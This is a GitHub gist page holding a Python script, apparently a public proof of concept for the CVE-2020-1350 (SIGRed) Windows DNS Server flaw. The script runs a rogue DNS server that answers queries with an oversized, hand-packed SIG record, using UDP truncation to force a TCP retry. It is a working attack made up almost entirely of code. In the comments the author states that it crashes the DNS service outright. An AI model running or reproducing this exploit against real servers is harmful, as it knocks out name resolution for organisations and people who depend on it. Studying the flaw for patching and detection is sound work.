Skip to content

Instantly share code, notes, and snippets.

@joaovarelas
Created July 16, 2020 21:36
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save joaovarelas/6d88a078e033d6a36da2be664f62879f to your computer and use it in GitHub Desktop.
Save joaovarelas/6d88a078e033d6a36da2be664f62879f to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
"""cve-2020-1350.py: Windows DNS Server Vulnerability"""
__author__ = "@joaovarelas"
__date__ = "July, 2020"
import binascii,socket,struct
from dnslib import *
from dnslib.server import DNSServer,DNSHandler,BaseResolver,DNSLogger
class PassthroughDNSHandler(DNSHandler):
    """DNS handler that answers every query with a hand-packed SIG record.

    ``get_reply`` never consults the server's resolver: it parses the
    incoming query, prints it, and returns a response whose single answer
    is a SIG resource record packed byte-by-byte into a ``DNSBuffer``.
    The module docstring identifies this script as a CVE-2020-1350
    proof of concept; run it only against systems you are authorised to
    test.
    """

    def get_reply(self, data):
        """Return the raw wire-format reply for the query in *data*.

        Args:
            data: DNS query in wire format, without the TCP length prefix.

        Returns:
            The packed response bytes (``DNSBuffer.data``).

        Raises:
            DNSError: propagated from ``DNSRecord.parse`` on a malformed
                query (``handle`` catches it).
        """
        request = DNSRecord.parse(data)
        print("====================REQUEST====================")
        print("Received via [{}]\n".format(self.protocol))
        print(request)

        rid = request.header.id
        # UDP replies carry TC=1 and are non-authoritative; TCP replies are
        # authoritative and not truncated.  Presumably TC=1 makes the
        # querying server retry over TCP -- confirm against the target.
        truncate = 1 if self.protocol == 'udp' else 0
        authority = 0 if self.protocol == 'udp' else 1
        header = DNSHeader(id=rid, qr=1, rd=1, ra=1, tc=truncate, auth=authority)
        reply = DNSRecord(header=header, q=request.q)

        # Signer name written as a two-byte compression pointer (offset 0x0d).
        sig_name = b'\xc0\x0d'

        # Signature field: 32 bytes over UDP; 32 zero bytes followed by
        # 65428 bytes of 0xff over TCP.
        sig_tcp = b'\x00' * 32 + b'\xff' * (65428)
        sig_udp = b'\x41' * 31 + b'\x00'
        signature = sig_udp if self.protocol == 'udp' else sig_tcp
        sig_len = len(signature)
        print("=========================")
        print("Signature Length: {}".format(sig_len))

        # Build the SIG record.  The RRSIG object is only used as a holder
        # for the fixed-size fields that are packed manually below.
        rrsig = RRSIG(covered=0, algorithm=0, labels=0, orig_ttl=0,
                      sig_exp=1893456000, sig_inc=1577836800,
                      key_tag=0, name=sig_name, sig=signature)
        rr = RR(request.questions[0].qname, QTYPE.SIG, ttl=0, rdata=rrsig)
        # NOTE(review): `reply` is never packed, but it shares `header`;
        # add_answer presumably refreshes the header's section counts, so
        # this call must stay -- verify against the installed dnslib.
        reply.add_answer(rr)
        print("====================REPLY====================")
        print("Sent via [{}]\n".format(self.protocol))

        # Pack the response by hand instead of calling reply.pack() /
        # rr.pack(), so the signer-name bytes are emitted verbatim rather
        # than re-encoded by dnslib.
        buf = DNSBuffer()
        header.pack(buf)
        request.q.pack(buf)
        buf.encode_name(rr.rname)
        buf.pack("!HHI", rr.rtype, rr.rclass, rr.ttl)

        # Reserve RDLENGTH and back-patch it once the RDATA size is known.
        rdlength_ptr = buf.offset
        buf.pack("!H", 0)
        start = buf.offset
        buf.pack("!HBBIIIH", rrsig.covered, rrsig.algorithm, rrsig.labels,
                 rrsig.orig_ttl, rrsig.sig_exp, rrsig.sig_inc, rrsig.key_tag)
        buf.append(sig_name)
        buf.append(b'\x00')
        buf.append(signature)
        end = buf.offset
        buf.update(rdlength_ptr, "!H", end - start)
        return buf.data

    def handle(self):
        """Read one query from the socket, build the reply and send it.

        For TCP the request is read until the 2-byte big-endian length
        prefix is satisfied (or the peer closes) and the reply is sent
        with its own length prefix.  For UDP the datagram is taken from
        ``self.request`` and the reply is sent back to
        ``self.client_address``.  ``DNSError`` raised while building the
        reply is logged, not propagated.
        """
        if self.server.socket_type == socket.SOCK_STREAM:
            self.protocol = 'tcp'
            data = self.request.recv(8192)
            if len(data) < 2:
                self.server.logger.log_error(self, "Request Truncated")
                return
            length = struct.unpack("!H", bytes(data[:2]))[0]
            while len(data) - 2 < length:
                new_data = self.request.recv(8192)
                if not new_data:
                    # Peer closed early; continue with what was received.
                    break
                data += new_data
            data = data[2:]
        else:
            self.protocol = 'udp'
            data, connection = self.request

        self.server.logger.log_recv(self, data)

        try:
            rdata = self.get_reply(data)
            self.server.logger.log_send(self, rdata)

            if self.protocol == 'tcp':
                # DNS over TCP: prefix the message with its 16-bit length.
                rdatalen = len(rdata)
                rdata = struct.pack("!H", rdatalen) + rdata
                self.request.sendall(rdata)
            else:
                connection.sendto(rdata, self.client_address)
        except DNSError as e:
            print("EXCEPTION HANDLER")
            self.server.logger.log_error(self, e)
class ProxyResolver(BaseResolver):
    """Resolver that forwards each request to an upstream DNS server.

    Attributes are set from the constructor arguments:
    ``address``/``port`` identify the upstream server and ``timeout`` is
    passed to ``DNSRecord.send`` for every forwarded query.
    """

    def __init__(self, address, port, timeout=0):
        """Store the upstream *address*, *port* and per-query *timeout*."""
        self.address = address
        self.port = port
        self.timeout = timeout

    def resolve(self, request, handler):
        """Forward *request* upstream and return the parsed reply.

        The upstream query uses TCP unless ``handler.protocol`` is
        ``'udp'``.  If the upstream query times out, an NXDOMAIN reply to
        *request* is returned instead.
        """
        use_tcp = handler.protocol != 'udp'
        try:
            proxy_r = request.send(self.address, self.port,
                                   tcp=use_tcp, timeout=self.timeout)
            reply = DNSRecord.parse(proxy_r)
        except socket.timeout:
            reply = request.reply()
            reply.header.rcode = RCODE.NXDOMAIN
        return reply
def send_tcp(data, host, port):
    """Send *data* to ``host:port`` over TCP and return the raw response.

    The response is expected to start with a 2-byte big-endian length
    prefix; reading continues until that many payload bytes have arrived
    or the peer closes the connection.

    Args:
        data: bytes to send (the caller supplies any length prefix).
        host: destination IPv4 address or hostname.
        port: destination TCP port.

    Returns:
        The bytes received, including the 2-byte length prefix.  The
        result may be shorter than announced (or empty) if the peer closed
        the connection early.
    """
    response = b""
    expected = None  # total size (prefix + payload) once the prefix is read
    # The context manager closes the socket even if connect/send/recv raises.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((host, port))
        sock.sendall(data)
        while expected is None or len(response) < expected:
            chunk = sock.recv(8192)
            if not chunk:
                # Peer closed the connection; avoid spinning forever.
                break
            response += chunk
            if expected is None and len(response) >= 2:
                expected = 2 + struct.unpack("!H", response[:2])[0]
    return response
def send_udp(data, host, port):
    """Send *data* to ``host:port`` over UDP and return one reply datagram.

    Args:
        data: bytes to send as a single datagram.
        host: destination IPv4 address or hostname.
        port: destination UDP port.

    Returns:
        The payload of the first datagram received (up to 8192 bytes).
        The call blocks until a datagram arrives.
    """
    # The context manager closes the socket even if sendto/recvfrom raises.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(data, (host, port))
        response, _ = sock.recvfrom(8192)
    return response
if __name__ == '__main__':
    # Command-line entry point: parse options, start a UDP server (and
    # optionally a TCP server) on the chosen address/port, then idle until
    # the UDP server stops.
    import argparse
    import time

    p = argparse.ArgumentParser(description="DNS Proxy")
    p.add_argument("--port", "-p", type=int, default=53,
                   metavar="<port>",
                   help="Local proxy port (default:53)")
    p.add_argument("--address", "-a", default="",
                   metavar="<address>",
                   help="Local proxy listen address (default:all)")
    p.add_argument("--upstream", "-u", default="8.8.8.8:53",
                   metavar="<dns server:port>",
                   help="Upstream DNS server:port (default:8.8.8.8:53)")
    p.add_argument("--tcp", action='store_true', default=False,
                   help="TCP proxy (default: UDP only)")
    p.add_argument("--timeout", "-o", type=float, default=5,
                   metavar="<timeout>",
                   help="Upstream timeout (default: 5s)")
    p.add_argument("--passthrough", action='store_true', default=False,
                   help="Dont decode/re-encode request/response (default: off)")
    p.add_argument("--log", default="request,reply,truncated,error",
                   help="Log hooks to enable (default: +request,+reply,+truncated,+error,-recv,-send,-data)")
    p.add_argument("--log-prefix", action='store_true', default=False,
                   help="Log prefix (timestamp/handler/resolver) (default: False)")
    args = p.parse_args()

    # Split "host:port"; the port falls back to 53 when omitted.
    args.dns, _, args.dns_port = args.upstream.partition(':')
    args.dns_port = int(args.dns_port or 53)

    print("Starting Proxy Resolver (%s:%d -> %s:%d) [%s]" % (
        args.address or "*", args.port,
        args.dns, args.dns_port,
        "UDP/TCP" if args.tcp else "UDP"))

    resolver = ProxyResolver(args.dns, args.dns_port, args.timeout)
    # --passthrough selects the custom handler defined in this file;
    # otherwise dnslib's stock DNSHandler forwards through the resolver.
    handler = PassthroughDNSHandler if args.passthrough else DNSHandler
    logger = DNSLogger(args.log, args.log_prefix)

    udp_server = DNSServer(resolver,
                           port=args.port,
                           address=args.address,
                           logger=logger,
                           handler=handler)
    udp_server.start_thread()

    if args.tcp:
        tcp_server = DNSServer(resolver,
                               port=args.port,
                               address=args.address,
                               tcp=True,
                               logger=logger,
                               handler=handler)
        tcp_server.start_thread()

    # Keep the main thread alive while the server thread runs.
    # NOTE(review): isAlive() here is called on the DNSServer object, not on
    # a threading.Thread -- confirm the installed dnslib provides it.
    while udp_server.isAlive():
        time.sleep(1)
@joaovarelas
Copy link
Author

Does this exploit crash the DNS server completely or just a thread?

@uzzzval I believe it crashes the DNS service completely. However, by default, the service is restarted automatically after a while (which, as stated by CPResearch, also increases the exploitation reliability).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment